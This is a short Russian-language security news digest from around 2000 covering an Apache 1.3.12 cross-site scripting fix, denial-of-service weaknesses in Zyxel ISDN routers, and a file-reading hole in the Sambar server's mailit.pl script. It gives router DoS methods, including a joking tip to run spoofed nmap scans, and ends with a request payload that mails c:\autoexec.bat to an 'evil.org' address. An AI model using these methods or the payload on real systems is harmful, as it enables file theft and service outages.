|
|
APACHE 1.3.12, Zyxel DoS, SAMBAR & CGI
ВЫШЕЛ APACHE 1.3.12
Apache 1.3.12: Была выпущена новая версия популярного httpd. В ней ликвидирована возможность того самого cross-scripting, применяемого, к примеру, системой tx3. Большая опасность этого - возможность подстановки собственных данных в страницу, которая передаётся через SSL-соединение. Путём несложной передачи данных как параметра методом GET своему скрипту атакующий легко может получить содержимое страницы. Подробная документация CERT находится по адресу : http://www.cert.org/advisories/CA-2000-02.html.
Уязвимости роутеров:
Роутеры ISDN RH348 и RT328, а так же ZyxelP128imh подвержены DoS, которое может быть осуществлено большим количеством различных способов. При SYN-сканировании роутера он перестаёт отвечать на соединения в течении 5 минут. Естественно, можно и нужно запускать nmap c опцией -S ;)
При простом соединении с портом 23 никто более не может подсоединиться к роутеру, даже если вы не прошли аутенификацию.
При получении большого количества ICMP-редиректов роутер перестанет выполнять свои функции и требует около 30 секунд на восстановление.
Для ликвидации уязвимостей требуется установить в Access Control List'e только вашу станцию, и запретить соединения с других.
Очередная уязвимость в httpd sambar. Скрипт /cgi-bin/mailit.pl, стоящий на данном сервере по умолчанию, позволяет читать файлы с диска системы, на которой стоит этот сервер: этот скрипт является системой отправки почты, и передача скрипту параметров можно заставить сервер отправлять данные кому-либо на почту.
server=smtp.example.com&
from=root@example.com&
recipient=evil@evil.org&
subject=Hi&body=Hello+World%0
A&attach=c:\autoexec.bat
duke
Team Void
|
|